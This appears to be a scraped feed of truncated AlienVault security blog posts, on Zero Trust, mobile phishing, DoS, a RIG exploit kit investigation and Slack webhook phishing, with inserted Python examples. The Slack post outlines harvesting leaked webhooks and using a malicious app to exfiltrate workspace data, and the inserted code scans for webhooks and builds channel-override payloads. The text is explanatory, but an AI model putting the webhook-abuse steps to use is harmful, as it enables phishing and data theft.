Many small companies are in this position now. Remote endpoints are a tempting target for hackers. Here are some helpful ideas:

- Require employees to use a VPN and have them use only company equipment for work. Company equipment shouldn’t be used by non-employees.
- Require Multi-factor authentication for critical application access.
- Provide that any video conferencing tools and applications are password-protected.
- Pre-install strong endpoint protection on company-owned devi

Published: 2020-04-20T12:00:00+00:00 | Feed: https://feeds.feedblitz.com/~/621983416/0/alienvault-blogs~Working-from-home-new-reality-for-even-small-businesses | Article: www.secnews.physaphae.fr/article.php?IdArticle=1665767 | Tags: Ransomware

AlienVault Blog - 5 most common mobile phishing tactics

In fact, Lookout data shows that 1 in 50 enterprise users are phished on mobile devices daily. Mobile phishing rates have doubled for Lookout users of Office 365 and G Suite. This is a serious problem. Lookout data suggests that enterprise users are three times more likely to fall for a phishing link when presented on the small screens of mobile devices rather than when presented on the screens of desktop OS, like Windows or macOS.

Phishing has moved to mobile

Most think “email” when they hear the word “phishing” but it is different on mobile. Mobile phishing extends beyond email to SMS, MMS, messaging platforms, and social media apps. Attacks are technically simple but novel in their approach. They seek to exploit human trust along social networks using personal context. For example, a parent would click without hesitation on a message saying their daughter has been in an accident at school. Employees also find it easier to perform tasks on a mobile device than on a desktop. Depositing checks via mobile banking app, for example, is simple, fast, and convenient, and there are many other examples like this. So, organizations must remain vigilant to keep pace with phishing threats that are increasingly targeting mobile users. An Akamai study highlights the dynamic nature of phishing sites - of over 2 billion domains analyzed, nearly 89% of the domains commonly associated with malicious sites had a life span of less than 24 hours. This emphasizes the need for advanced detection capabilities.
Historically, organizations have invested heavily in security solutions such as secure email gateways, inbox scans, and end user training. Yet, these techniques remain too narrowly focused on email and do not protect modern messaging, such as SMS, Slack, and Microsoft Instant Messaging. Combating sophisticated phishing attacks on mobile is the new battleground as attackers continue to employ sophisticated mobile phishing strategies.

Most common mobile phishing tactics

There are several techniques that cybercriminals use to make their phishing attacks more effective on mobile. Below are some of the more commonly used tactics that Lookout has observed in the wild: URL padding is a technique that includes a real, legitimate domain within a larger URL but pads it with hyphens to obscure the real destination. For example, hxxp://m.facebook.com----------------validate----step1.rickytaylk[dot]com/sign_in.html con

Published: 2020-04-17T12:00:00+00:00 | Feed: https://feeds.feedblitz.com/~/621775856/0/alienvault-blogs~most-common-mobile-phishing-tactics | Article: www.secnews.physaphae.fr/article.php?IdArticle=1660297 | Tags: Threat

AlienVault Blog - 7 key steps to Zero Trust

tenets of zero trust and how the confidence is gained for untrusted traffic and authorized on a continual basis. The comprehensive nature of Zero Trust can be a little overwhelming in a world of limited resources, time and budgets. As security breaches persist, organizations understand that something must be done, and Zero Trust is most certainly worth looking into. As an organization begins their journey to Zero Trust – first acknowledging that it is, in fact, a journey involving lengthy cycles of assessing, planning, architecting and designing, piloting and implementing – it is important to understand how far you want to take this journey and then follow an overall roadmap to get you there.
At a high level, this plan or roadmap should cover the following:

Develop a strategy – Understand first why you want to take the organization to Zero Trust. What are the overall goals of the business? Do you only want to target a specific portion of your network, or the entire enterprise? Will you only be implementing a software defined perimeter, washing your hands and saying “Done!”? Mapping the business’ goals to the cyber threats putting those goals at risk will help formulate the Zero Trust strategy to mitigate that risk. This will help you build your case and get executive buy-in because without that, you will not have the support you need to see this journey to the end. The length of your journey will be determined by the strategy. Given the broad nature of Zero Trust, many key departments of the business, such as development, finance, legal and HR should also be involved and/or consulted in the overall composition of the strategy. Involving the right people early on in the process not only fosters better communication, but also helps to provide for a successful deployment overall.

Define your Element of Protection – As your strategy is being developed, you need to understand what you are trying to protect. Most likely your defined element or elements of protection is your business data. You need to determine what part of your business assets will be protected. Will it be only sensitive data? Customer data? All data? What are the varying levels of data you need to protect? PCI and ePHI data, for example, may have different classifications than financial records, or product designs. You need to classify all data to understand how it is to be protected.

Enumerate your data & traffic flows – The next step is to see where that data is stored, where it is going, and who or what is handling that data. This is a critical step since it will drive a bulk of the policy decisions in your architecture.
You also don’t want to complete your Zero Trust journey only to discover a breach still occurred because of some neglected area.  Mapping these transaction flows will also draw on asset and application inventories, and the resulting taxonomy will be reused in other development areas.  For example, a data transaction that is discovered running from an application server to a database will involve cataloging the access requirements of the application, the users that access that application, how they access the data, the application owners, system owners, supporting developers, database owners and administrators, and the communication requirements on the network.  The more information you can obtain for each component at every step along the flow, the more ground you gain in developing policy and the automation components that dynamically change that policy. Assess Your Zero Trust Maturity – Many organizations already have various elemen]]> 2020-04-16T12:00:00+00:00 https://feeds.feedblitz.com/~/621690596/0/alienvault-blogs~key-steps-to-Zero-Trust www.secnews.physaphae.fr/article.php?IdArticle=1658169 False Vulnerability,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Slack phishing attacks using webhooks Incoming Webhooks allow you to post messages from your applications to Slack. By specifying a unique URL, your message body, and a destination channel, you can send a message to any webhook whose URL you know, in any workspace, regardless of membership. Webhooks take the format of https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX. Generally, Slack webhooks are considered a low-risk integration due to the following assumptions: Webhook configuration requires selection of a target channel, reducing the scope of abuse to a single channel. The unique webhook URL is secret. The webhook only accepts data, and thus alone cannot expose sensitive data to third parties. 
A deeper dive into webhooks shows that this is not entirely accurate. First, a channel override allows you to override the previously specified webhook target channel by adding the “channel” key to your JSON payload. If you gain access to a webhook for one channel, you can use it in others. Consider sending to #general, #engineering, and other default or common channels to target a wider audience. (Screenshot: channel override in Slack) In some cases, this can also override channel posting permissions (such as admin-only posting). (Screenshot: changing channel permissions) Slack documentation suggests that allowed target channels are based on the original creator of the webhook: “posting_to_general_channel_denied is thrown when an incoming webhook attempts to post to the "#general" channel for a workspace where posting to that channel is 1) restricted and 2) the creator of the same incoming webhook is not authorized to post there. You'll receive this error with a HTTP 403.” So if you can find a webhook created by an admin - congrats, you can post to admin channels! A quick search on Github shows 130,989 public code results containing Slack webhook URLs, with a majority containing the full unique webhook value. The last assumption is true - webhooks can only accept data. That’s where we get creative. Slack webhook phishing with Slack apps The process itself is fairly simple: discover leaked webhooks; create a Slack app and allow public installation of the app; send malicious messages to the discovered hooks; track the workspaces that install the malicious app; use the app to exfiltrate data from the workspaces that installed it. Discovery As mentioned earlier, Github is a good start for scraping publicly committed webhook data. App creation First, create an app. You will also need a web server to handle the OAuth flow. (Screenshot: app creation in Slack) Slack apps don’t require OAuth, but in this case we will be using the Slack API to access data in workspaces where the malicious app is installed. 
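The webhook discovery step and the channel override described above, as an added example that is not code from the article or from Slack: a scanner that finds webhook URLs of the documented shape in a blob of source text, a builder for the JSON payload carrying the "channel" override, and a redaction helper so a leak can be reported without re-leaking the token. The sample source text is constructed, the ID and token lengths are assumptions matching the format the article shows, and the override only takes effect where the hook honours the channel key, as the article describes.

```python
import json
import re

# Incoming webhook URL shape shown in the article:
#   https://hooks.slack.com/services/T<team>/B<bot>/<token>
# Assumed lengths: IDs of 8+ uppercase alphanumerics and a 24-character token.
WEBHOOK_RE = re.compile(
    r"https://hooks\.slack\.com/services/(T[A-Z0-9]{8,})/(B[A-Z0-9]{8,})/([A-Za-z0-9]{24})"
)

# Constructed sample of "committed source code" of the kind a public-repo search turns up.
SAMPLE_SOURCE = '''
SLACK_URL = "https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX"
# previous hook, supposedly rotated:
#   https://hooks.slack.com/services/T11111111/B22222222/abcdefghijklmnopqrstuvwx
NOT_A_HOOK = "https://hooks.slack.com/services/T1/B2/short"
'''


def find_webhooks(text: str) -> list:
    """Discovery step: every webhook URL in the text, with its team and bot IDs."""
    return [
        {"url": m.group(0), "team_id": m.group(1), "bot_id": m.group(2)}
        for m in WEBHOOK_RE.finditer(text)
    ]


def build_override_payload(message: str, channel: str) -> str:
    """JSON body with the 'channel' key that re-targets a hook to a channel it was not configured for."""
    return json.dumps({"text": message, "channel": channel})


def redact(text: str) -> str:
    """Keep team/bot IDs for triage but strip the secret token before it goes into a ticket."""
    return WEBHOOK_RE.sub(
        lambda m: f"https://hooks.slack.com/services/{m.group(1)}/{m.group(2)}/REDACTED", text
    )


if __name__ == "__main__":
    for hook in find_webhooks(SAMPLE_SOURCE):
        print(redact(hook["url"]))
    # Delivery would be requests.post(hook["url"], data=payload,
    # headers={"Content-Type": "application/json"}); deliberately not executed here.
    print(build_override_payload("Please re-authenticate at <link>", "#general"))
```

Note that a 24-character token is the part that matters for the defender: the team and bot IDs are enough to identify which workspace and which integration leaked, so they can stay in the report while the token is rotated.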
When the user attempts to install the application, they must approve the requested OAuth scopes. Their approval is sent]]> 2020-04-14T16:30:00+00:00 https://feeds.feedblitz.com/~/621561410/0/alienvault-blogs~Slack-phishing-attacks-using-webhooks www.secnews.physaphae.fr/article.php?IdArticle=1654673 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Can incident response be fun? He writes: “Turns out, gamification works great on students. And apparently employees like it just as much. Companies that train large volumes of staff are rushing to use games, in a variety of forms. The goal is the same: turn a boring, repetitive and difficult series of tasks into an enjoyable, interesting activity that gets better results. Games provide intrinsic motivation—that is, people play them because they want to—as opposed to bribing someone with a raise (an extrinsic motivation).” So what if gamification can prepare IT professionals to improve their incident response? Well, cybersecurity people are a bunch of nerds. And everyone knows nerds love tabletop roleplaying games like Dungeons and Dragons. CISO Michael Ball had an epiphany. He decided to turn incident response into a tabletop roleplaying game. His game is called Breach the Keep. I asked him what inspired him to invent the game. “I've done tons of executive training, both as the executive being trained, and as the trainer. Boring scripts, little engagement. No real team building. The CSIRT (computer security incident response team) has to be a team.  Not just a group you pull together in an emergency! They have to know one another's roles, and how to communicate with each other and the corporate stakeholders before the chaos of a breach. None of the training I've seen to date engages the executives to develop the camaraderie of a team.” Roleplaying games are all about using your imagination, and they’re often set in a high fantasy setting. Breach the Keep is no exception. 
As the datasheet describes: “We will take you back in time into the realms of medieval and have a little fun with our version of Dungeons and Dragons. Through multiple scenarios we can help enhance your company’s team building abilities, identify gaps within the team and improve real world incident response time. Although the game is designed to imply information security type scenarios, we are going to use our imaginations and move the entire group back 400 years into the past. Instead of datacenters, we're protecting the castle’s keep.” Ball describes the roles in the game. “The CEO is the King or Queen. The CIO is Commander in Arms. CISO is the Mage or Vizier. HR (human resources department) is Chancellor. Corp Comms is the Town Crier. Network Admins are Cavalry, and Security Analysts are Knights.” The datasheet explains some of the basics of the game. “Players will be giv]]> 2020-04-14T12:00:00+00:00 https://feeds.feedblitz.com/~/621545386/0/alienvault-blogs~Can-incident-response-be-fun www.secnews.physaphae.fr/article.php?IdArticle=1654214 False Studies None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Assess and adapt for resiliency 2020-04-09T15:30:00+00:00 https://feeds.feedblitz.com/~/621149564/0/alienvault-blogs~Assess-and-adapt-for-resiliency www.secnews.physaphae.fr/article.php?IdArticle=1644976 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC The Zero Trust Authorization Core The Foundation of a Zero Trust Architecture (ZTA) talked about the guiding principles, or tenets, of Zero Trust.  One of the tenets mentions how all network flows are to be authenticated before being processed and access is determined by dynamic policy.   A network that is intended to never trust, and to always verify all connections, requires technology that can determine confidence, authorize connections and ensure that future transactions remain valid.  
The heart of any ZTA is an authorization core involving equipment within the control plane of the network that determines this confidence and continually re-evaluates it for every request.  Given that this authorization core is part of a control plane, it needs to be logically separated from the portion of the network used for application data traffic (the data plane).   (ZTA diagram) Based on the designed ZTA and the overall approach, components of the authorization core may be combined into one solution or stand on their own as individual hardware and/or software-based solutions. Communication Agent – the source of the access should provide enough information for confidence to be calculated.  Enhanced identity attributes such as user and asset status, location, authentication method and trust scoring should be included in every communication so that it can be properly evaluated. Enforcement Engine – also known as an Enforcement Point.  This should be placed as close to the element of protection (the data) as possible.  You might think of this as the data’s bodyguard. The Enforcement Engine will authorize the requested communication based on policy and continually monitor the traffic, stopping it if necessary as requested by the Policy Engine.  An Enforcement Engine may prevent a system holding the element of protection from being discoverable, for example. Policy Engine – makes the ultimate decision to grant access to the asset and informs the Enforcement Engine.  The policy rules will depend on the implemented technology but will typically involve the who, what, when, where, why and how for access involving network services, endpoint and data classes. Trust/Risk Engine – analyzes the risk of a request or action.  
The Trust/Risk Engine informs the policy engine of deviations in an implemented trust algorithm, evaluates the communication agent’s data against data stores and can utilize static rules and machine learning to continually update agent scores as well as component scores within the agent.  A trust algorithm that computes a score-based confidence level from criteria, values and weights set by the enterprise, along with a contextual view of an agent’s history and other data, provides the most comprehensive approach to detecting threats.  A score and context-based trust algorithm will identify an attack that stays within a user’s role, which an algorithm that does not take historical and other user data into account will miss.  For example, a score and context-based trust algorithm may pick up on a user account or role that is accessing data outside normal business hours in an unusual way or from an unrecognized location.  An alternative algorithm that relies solely on a specific set of qualified attributes may evaluate faster but will not have the historical context to recognize that the access request is odd and advise the policy engine to require stronger authentication before proceeding. Data Stores – As stated, a preferred approach is to implement a score and c]]> 2020-04-08T12:00:00+00:00 https://feeds.feedblitz.com/~/621065970/0/alienvault-blogs~The-Zero-Trust-Authorization-Core www.secnews.physaphae.fr/article.php?IdArticle=1642861 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC AT&T Cybersecurity announces \'Partners of the Year Awards\' Winners AT&T Cybersecurity Partner Program enables leading managed security service providers (MSSPs), VARs, system integrators, managed detection & response providers (MDRs) and corporate resellers to sell and support AT&T Cybersecurity solutions and deliver compelling services powered by USM Anywhere in the global marketplace. 
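Returning to the Zero Trust Authorization Core article above: the score-and-context trust algorithm it contrasts with an attribute-only check, written out as an added Python example (not code from the article or from any product). The weights, the confidence threshold, the role map, the history and the two requests are constructed values. The contrast shown is the one the article makes: an attribute-only check passes an in-role request that the contextual score flags because of the hour and the location, and the policy engine answers with a step-up rather than a plain allow.

```python
from dataclasses import dataclass, field


@dataclass
class Agent:
    """Communication agent: identity and context attributes sent with each request."""
    user: str
    role: str
    auth_method: str        # "password", "mfa" or "cert"
    device_compliant: bool
    location: str
    hour: int               # local hour of the request, 0-23
    resource_class: str     # classification of the element of protection requested


@dataclass
class History:
    """Data-store view of what is normal for this agent (assumed learned over time)."""
    usual_locations: set = field(default_factory=set)
    usual_hours: range = range(8, 19)
    usual_resources: set = field(default_factory=set)


# Enterprise-chosen criteria, weights and threshold (assumed illustrative values).
ROLE_ALLOWS = {"finance": {"financial", "pci"}, "engineering": {"product-design"}}
WEIGHTS = {"auth": 30, "device": 20, "location": 20, "hours": 15, "resource": 15}
AUTH_STRENGTH = {"cert": 1.0, "mfa": 0.9, "password": 0.4}
REQUIRED_CONFIDENCE = 70


def attribute_only_decision(agent: Agent) -> str:
    """The faster, history-blind check: role permits the data class and the user authenticated."""
    in_role = agent.resource_class in ROLE_ALLOWS.get(agent.role, set())
    return "allow" if in_role and agent.auth_method in AUTH_STRENGTH else "deny"


def trust_score(agent: Agent, history: History) -> int:
    """Weighted confidence: each criterion contributes its weight scaled by how well it is met."""
    score = WEIGHTS["auth"] * AUTH_STRENGTH.get(agent.auth_method, 0.0)
    score += WEIGHTS["device"] if agent.device_compliant else 0
    score += WEIGHTS["location"] if agent.location in history.usual_locations else 0
    score += WEIGHTS["hours"] if agent.hour in history.usual_hours else 0
    score += WEIGHTS["resource"] if agent.resource_class in history.usual_resources else 0
    return round(score)


def contextual_decision(agent: Agent, history: History) -> str:
    """Policy engine using the score: allow, require stronger authentication, or deny."""
    if agent.resource_class not in ROLE_ALLOWS.get(agent.role, set()):
        return "deny"
    score = trust_score(agent, history)
    if score >= REQUIRED_CONFIDENCE:
        return "allow"
    if agent.auth_method == "password":
        return "step-up"   # re-authenticate with MFA before the Enforcement Engine lets it through
    return "deny"


# Constructed scenario: a finance user who normally reads financial records from the office.
ALICE_HISTORY = History(usual_locations={"Dallas office"}, usual_resources={"financial"})
NORMAL_REQUEST = Agent("alice", "finance", "password", True, "Dallas office", 10, "financial")
ODD_REQUEST = Agent("alice", "finance", "password", True, "unrecognized", 3, "pci")

if __name__ == "__main__":
    for req in (NORMAL_REQUEST, ODD_REQUEST):
        print(req.hour, req.location, req.resource_class,
              attribute_only_decision(req), contextual_decision(req, ALICE_HISTORY))
```

Both requests are within the finance role, so the attribute-only check allows both; the 3 a.m. request for PCI data from an unrecognized location scores 32 against a required 70 and is sent back for step-up authentication instead.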
With a strong focus on partner enablement, the program is designed to help partners create new opportunities for business growth, expansion and profitability. Below is the full list of winners for the 2019 Partner of the Year Awards, along with their comments: Global Awards: Global Partner of the Year: Binary Defense To receive this award for three out of the past four years is quite an honor. As a managed security service provider, our mission is to help our customers improve their cybersecurity posture. Our partnership with AT&T continues to thrive because of their world-class SIEM platform and our 24/7/365 Security Operations Center that can tune, manage and monitor our customers’ SIEM instances. - Mike Hofherr, Chief Operating Officer   Growth Partner of the Year: RoundTower Technologies    The partnership with AT&T Cybersecurity enables us to provide our clients with deeper and more advanced Managed Security Solutions; delivering comprehensive visibility into their organization’s overall security posture and allowing our 24x7 Managed Security Solutions team to take proactive approaches to emerging threats. - Michael Swiencki, VP, Managed Services New Partner of the Year: Stefanini Rafael Seguranca E Defensa S.A.                                                            The AT&T Cybersecurity team aligns closely with our team and our strategy for the cybersecurity market.  USM is flexible and, importantly, offers a point of differentiation.  Our focus is on intelligence as well as USM’s SIEM functionality. We believe that the sales, implementation, and tech support offered by the AT&T Cybersecurity team has assisted our business immeasurably during the last year. Let’s move and win more deals in 2020. - Natal Da Silva, CEO Distributor of the Year: Ingram Micro INC. 
“With the explosion of ransomware, and the sophisticated cyber threats facing businesses of all sizes, we must help our customers to identify and respond to attacks faster than ever,” says Eric Kohl, vice president, Security Business Unit at Ingram Micro.  “In working hand in hand with market leading cyber companies like AT&T Cybersecurity, we are able to offer comprehensive solutions to our MSP’s and solution providers.  We’re thrilled to be recognized by AT&T Cybersecurity with this award.” - James Payne, Operations Manager Regional Awards: These awards recognize partners that had the highest sales bookings in each of the]]> 2020-04-07T12:00:00+00:00 https://feeds.feedblitz.com/~/621002010/0/alienvault-blogs~ATampT-Cybersecurity-announces-%e2%80%98Partners-of-the-Year-Awards%e2%80%99-Winners www.secnews.physaphae.fr/article.php?IdArticle=1642862 True Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Common focal points of DoS attacks 16 DDoS attacks take place every minute. DoS attacks require fewer resources, and so pose an even greater threat. In this post, we’ll discuss what a DoS attack is and how it differs from a Distributed Denial of Service (DDoS) attack. We’ll then look at one of the latest techniques bad actors use to maximize the impact of their actions. What is a DoS Attack? A DoS attack is pretty much what it sounds like: the bad actors render a device or computer unavailable to authorized users by interrupting its normal functioning. DoS attacks flood the target device with requests so that the device becomes overwhelmed. The device’s resources are all consumed servicing these bogus requests, so when a valid request comes along, there are no resources left. What’s the point of these attacks? There could be several reasons to launch a DoS attack, including: business rivalry; a dispute against the company; extorting a ransom to stop the attack; damaging the business. What’s the difference between a DoS and DDoS Attack? Both use the technique of overwhelming the target device. The primary difference is in the number of computers used during the attack. With a DoS attack, just one computer is needed. With a Distributed Denial of Service attack, several machines or bots are used instead. Which form of attack is more effective? You might feel that the DDoS attack is more effective. 
It’s indeed easier to overwhelm a device or server with requests from many bots than from a few. But a distributed attack is also more likely to be detected and blocked. One computer attacking the system might not have the same brute force, but you don’t always need brute force. Say, for example, that a cashier clones your debit card while you’re paying for your items. She notices that you get a message from your bank whenever you swipe your card. She’d like to shop for as long as possible without you noticing, so she gets a friend to launch a DoS attack on your phone. Her friend might use a flooding technique that consumes all the memory and processing power of your phone, so you won’t receive messages or phone calls. This is a simplified example, but it shows that you don’t always need an army for these kinds of attacks. More advanced attacks According to Wired, we’re liable to see more DoS attacks that abuse the Web Services Dynamic Discovery (WS-Discovery) protocol. This is admittedly a clever technique and one that becomes more relevant as the Internet of Things expands. In this attack, the hacker ignores the primary system and instead targets vulnerable devices connected to the same network: printers, CCTV cameras, thermostats, and so on. Those devices usually don’t have the same level of protection that a company’s servers have. The hacker spoofs the target’s IP address as the source of a discovery request sent to the device; the device then sends its response to the legitimate target server and ties up its resources. This attack is more difficult to detect than a direct attack because the traffic arrives from devices authorized to use the network. 
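The single-source versus distributed distinction drawn above, as an added example that is not part of the original post: a window-based request-rate check over constructed firewall log lines that separates a normal baseline, a one-source flood (a single IP that can simply be blocked) and a distributed flood (many small contributors that no per-source block will stop). The log format, the thresholds and the addresses are assumptions.

```python
from collections import Counter

DST = "10.0.0.5"   # assumed victim address


def burst(src: str, t0: float, n: int, spacing: float = 0.01) -> list:
    """n requests from one source starting at t0, `spacing` seconds apart (constructed data)."""
    return [f"{t0 + i * spacing:.2f} {src} {DST} 443" for i in range(n)]


# Constructed firewall-style logs: "timestamp src_ip dst_ip dst_port".
SINGLE_SOURCE_LOG = burst("198.51.100.7", 0.0, 500) + ["4.00 192.0.2.1 10.0.0.5 443"]
DISTRIBUTED_LOG = [line for i in range(1, 51) for line in burst(f"203.0.113.{i}", 0.0, 10)]
NORMAL_LOG = [f"{i:.2f} 192.0.2.{i % 5 + 1} {DST} 443" for i in range(20)]


def parse(lines):
    """Yield (timestamp, src, dst, port) tuples from the log format above."""
    for line in lines:
        ts, src, dst, port = line.split()
        yield float(ts), src, dst, int(port)


def classify(lines, window: float = 10.0, rate_threshold: float = 25.0, dominance: float = 0.8):
    """Look at the first `window` seconds and return (verdict, top sources).

    verdict is 'normal' below rate_threshold requests/second, 'dos' when one source
    accounts for at least `dominance` of the flood, otherwise 'ddos'.
    """
    events = sorted(parse(lines))
    if not events:
        return "normal", []
    start = events[0][0]
    in_window = [e for e in events if e[0] - start <= window]
    per_src = Counter(src for _, src, _, _ in in_window)
    total = sum(per_src.values())
    if total / window < rate_threshold:
        return "normal", per_src.most_common(3)
    top_src, top_n = per_src.most_common(1)[0]
    if top_n / total >= dominance:
        return "dos", [(top_src, top_n)]      # one address to block
    return "ddos", per_src.most_common(3)     # needs rate limiting or upstream scrubbing


if __name__ == "__main__":
    for name, log in (("single", SINGLE_SOURCE_LOG), ("distributed", DISTRIBUTED_LOG), ("normal", NORMAL_LOG)):
        print(name, classify(log))
```

The point the article makes in reverse: the distributed log is just as easy to spot as the single-source one (both cross the rate threshold), but only the single-source verdict comes with an address that blocking will actually fix.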
Common focal points of DoS attacks DoS attacks fall into one of two basic categories: Flood attacks B]]> 2020-04-06T12:00:00+00:00 https://feeds.feedblitz.com/~/620936476/0/alienvault-blogs~Common-focal-points-of-DoS-attacks www.secnews.physaphae.fr/article.php?IdArticle=1641109 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Here is why your healthcare provider cannot accept Venmo payments   If you are just now discovering this setting, you can also hide all your past transactions so that all of your activity is hidden. Of course, if you want to have some fun, you can name your transactions whatever you want, as one of my wise-guy friends did when sending some money to me: (Screenshot: a joke transaction note describing illicit activity) Apparently, some folks are not joking, and are broadcasting all kinds of illicit activity through the platform.  Be aware that illegal transactions could get you kicked off the application, so it is not recommended. The real problem is this: even if you set your Venmo to “private” mode, it still leaks too much inferential information about all of your associations.  If you go to a person’s profile page, there is a heading named “Friends” that lets you see everyone in that person’s Venmo world: (Screenshot: the Friends list in Venmo, which can be abused) This is a social engineer’s dream!  The entire family of a total stranger can be accurately mapped just by scrolling through their “Friends” list.  This is exactly why the “grandparent scam” is so effective.  To take this to the next level, if a person happens to pay a medical provider with Venmo, a social engineer could use all the publicly available information to easily impersonate that person, leading to a full medical records breach. This is why your healthcare provider will not accept payments through the application. When will Venmo lock down the Friends page?  Why was that not built into the application from the start?   
Venmo is part of PayPal, and it is a safe way to move money between you and your friends and family.  However, it just needs a bit of a privacy nudge.  ]]> 2020-04-02T12:00:00+00:00 https://feeds.feedblitz.com/~/620703550/0/alienvault-blogs~Here-is-why-your-healthcare-provider-cannot-accept-Venmo-payments www.secnews.physaphae.fr/article.php?IdArticle=1633905 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC The foundation of a Zero Trust architecture 2020-04-01T12:00:00+00:00 https://feeds.feedblitz.com/~/620646194/0/alienvault-blogs~The-foundation-of-a-Zero-Trust-architecture www.secnews.physaphae.fr/article.php?IdArticle=1631969 False Vulnerability None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 9 Reasons to hire an InfoSec candidate without experience: Focus on skillset vs. experience (ISC)² Cybersecurity Workforce Study 2019, for example, the global cybersecurity workforce gap is about 4.07 million. (Figure: (ISC)² cybersecurity workforce study) The report suggests that the current cybersecurity workforce needs to increase by 62 percent to meet the needs of businesses. That’s why organizations and businesses are taking the initiative by reducing the barriers to entering the field for young specialists. 2. Cyberattacks are becoming more frequent and successful The global cost of cybercrime in 2018 alone was estimated to be over $45 billion, and this amount rises every year. Three kinds of attacks - ransomware, spoofing/BEC, and spear-phishing - have seen the largest increase, according to the AT&T Cybersecurity report. 
(Figure: increase in attacks) Besides, the attacks are becoming more sophisticated and successful (according to AT&T): The average cost of one successful cybersecurity incident involving data loss increased from $4.9 million to $7.5 million. 88 percent of cybersecurity professionals have reported an increase in threats in the past year. Cybercrime is becoming commercialized, meaning that criminals sell attack components on the dark web. A person without coding knowledge can now launch and relaunch a sophisticated cyber-attack thanks to tools and code sold online. 3. The requirement to have a degree isn’t regulated by anyone Unlike fields like medicine where one must have a degree to practice the profession, InfoSec entry-level specialists can freely begin their careers without one. The risk of being outcompeted by those with an academic degree in cybersecurity is lower compared to other fields. For one, a lack of a degree in cybersecurity doesn’t affect the salary. According to the 2020 Cybersecurity Salary Survey, 55 percent of individuals working as a “security analyst/threat intelligence expert” without a degree earn between $51K and $90K. (Figure: salaries with no academic degree. Credit: 2020 Cybersecurity Salary Survey) This finding was similar across many other professions, including penetration tester, network security engineer, security/cloud architect, and security directo]]> 2020-03-31T12:00:00+00:00 https://feeds.feedblitz.com/~/620586656/0/alienvault-blogs~Reasons-to-hire-an-InfoSec-candidate-without-experience-Focus-on-skillset-vs-experience www.secnews.physaphae.fr/article.php?IdArticle=1630088 False Studies None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Stories from the SOC- RIG Exploit Kit whitepaper that was released December 2, 2019. BroadAnalysis provided a step-by-step explanation of this exploit’s lifecycle, including all indicators of compromise (IOCs). 
Using the pulses created in OTX and threat intelligence from Alien Labs, AT&T’s Security Operations Center (SOC) was able to identify the initial behaviors of this threat and work in concert with the customer’s staff to mitigate the ongoing activity. Investigation Initial alarm review Indicators of Compromise (IOCs) (Figure: RIG IOCs) The initial alarm surfaced as the result of a Domain Name System (DNS) request to the OTX IOC usa.lucretius-ada[.]com, an IOC associated with the first stage of the cyber kill chain. Upon further review, we realized this alarm triggered on the basis of a DNS request alone. After preliminary analysis, we determined the traffic did not directly correlate to an infection occurring on the endpoint, so we made the conscious decision to expand the Investigation. Expanded investigation Events search Given that we had a positive hit on the domain as an IOC, we then conducted a query for all events that matched this domain. We discovered twelve firewall events egressing to this domain from points of origin other than the initial source found in the alarm. After aggregating the related events, we determined there were six unique sources that had established connections to this domain. Reviewing these source devices, two appeared to be cell phones based on their hostnames, and the others appeared to be either user endpoints or possibly servers. These assets are not registered assets in USM Anywhere; thus, we were unable to derive additional information. Given the limited knowledge of the unregistered assets, at this point we had to rely on interfacing with the customer to verify whether these devices were vulnerable and how best to plan our avenue for thwarting this threat. Event deep dive Now that we had observed successful network traffic to the malicious domain, we turned back to the white paper from BroadAnalysis. The indicator we are matching is a specific URL on this domain. 
Reviewing the white paper, the indicator is: usa.lucretius-ada.com GET /zcvisitor/ We observed this URL in every firewall log from these six sources. At this point we can confidently say that six devices have successfully reached out to the malicious URL and that they are likely infected by the RIG exploit kit. Reviewing for additional indicators After discovering these infected endpoints, we began building our notes for the Investigation. Simultaneously we reviewed the BroadAnalysis white paper to look for additional steps of the cyber kill chain being executed by these devices. Thankfully we were unable to discover any additional indicators, and it appeared that we were still in the first stages of the exploit. Response Building the investigation Given the urgency of the situation, we created a high severity Investigation for the customer. Utilizing the capabilities of USM Anywhere, we generated a CSV report with the full event activity we were able to observe so they could have visibility into the events and situation. After attaching our report, we developed our notes to ]]> 2020-03-30T12:00:00+00:00 https://feeds.feedblitz.com/~/620538770/0/alienvault-blogs~Stories-from-the-SOC-RIG-Exploit-Kit www.secnews.physaphae.fr/article.php?IdArticle=1627964 False Ransomware,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC The future of cybersecurity for connected cars Connected cars have slowly become mainstream, with more than 700 million of them expected to be operating on roads by 2030. Most new vehicles are leaving production lines with a host of features that require a connection to the online world, including GPS, lane assistance, collision avoidance, and modern infotainment systems. However, while connected vehicles offer abundant opportunities for the consumer, automakers need to seriously consider what they mean for consumer privacy and security. 
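Returning to the RIG exploit kit investigation above: the correlation the SOC performed by hand, matching a DNS lookup of the IOC domain and firewall hits on the /zcvisitor/ path, then aggregating unique sources and guessing phones from hostnames, as an added Python example (not the SOC's code and not USM Anywhere's). The event format and the sample events are constructed; the IOCs are the ones quoted in the article, kept defanged in the code. The domain match is a suffix match, so a look-alike that merely begins with the IOC (last sample line) does not count.

```python
import re
from collections import defaultdict

# IOCs quoted in the article from the BroadAnalysis write-up, kept defanged here.
IOC_DOMAIN = "usa.lucretius-ada[.]com"
IOC_URL_PATH = "/zcvisitor/"

# Constructed sample events (assumed format: "source_type hostname src_ip detail").
SAMPLE_EVENTS = """
dns ws-1042 10.1.4.21 query=usa.lucretius-ada.com
fw ws-1042 10.1.4.21 GET http://usa.lucretius-ada.com/zcvisitor/ 200
fw iphone-amy 10.1.9.3 GET http://usa.lucretius-ada.com/zcvisitor/ 200
fw srv-db01 10.1.2.7 GET http://usa.lucretius-ada.com/zcvisitor/ 200
fw ws-2200 10.1.4.88 GET http://cdn.example.net/app.js 200
fw ws-2201 10.1.4.89 GET http://usa.lucretius-ada.com/favicon.ico 404
dns ws-3311 10.1.5.5 query=lucretius-ada.com.example.org
"""


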